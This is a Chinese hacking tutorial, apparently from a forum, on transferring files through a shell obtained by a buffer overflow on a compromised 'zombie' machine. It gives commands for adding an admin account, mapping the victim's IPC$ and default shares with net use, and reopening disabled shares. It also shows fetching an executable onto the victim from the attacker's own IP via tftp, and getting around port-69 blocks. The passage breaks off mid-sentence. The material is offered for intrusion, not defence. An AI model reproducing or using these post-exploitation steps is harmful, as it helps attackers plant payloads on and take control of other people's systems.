上一篇:探测远程主机上防火墙允许开放端口 >>
溢出下shell下的文件上传
1.首先要说的是初学者最爱的ipc$共享传送方式了,用法很简单。先在溢出shell下建立一个管理员权限的帐号,然后在本地的cmd下与肉鸡进行连接,命令如下:
net use \ip\共享目录(后面要大$) "密码" /user:"用户名"
copy c:\file \ip\共享目录
这里再提供一个思路,大家有没有想过其实我们也可以通过肉鸡来入侵我们自己的机器同样达到传送文件的目的,只是将上传改为下载。后面的命令改为
copy \你的ip\共享目录\文件 c:\file
大家可以根据这个思路活学活用。玩过ms03-049的朋友都知道这个溢出需要139,445端口,所以只要溢出成功就直接将对方的共享目录映射到本地,这样就剩得一条条打命令了,命令如下:
net use z: \ip\共享目录
如果对方把默认共享关闭了你可以在溢出shell下用net share命令开启,另外传完文件后记得得断开连接,命令:ne use z:\ip\共享目录 /del
2.接着我们说一下很多朋友都用的tftp方式。首先你得拥有一个公网ip,然后去网上down一个tftpd32.exe,把它放到你要传送的文件的目录里运行一下就ok了。在溢出shell下执行命令:
tftp -i 你的ip get xx.exe
这样就完成了文件的传输,当管理员限制用tftp传送文件,一般就是直接封69端口,修改默认69端口,tftpd32.exe等tftp服务端
是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次
tftp服务端。至于客户端
在system32\drivers\etc\文件夹下有一个services文件。打开如下: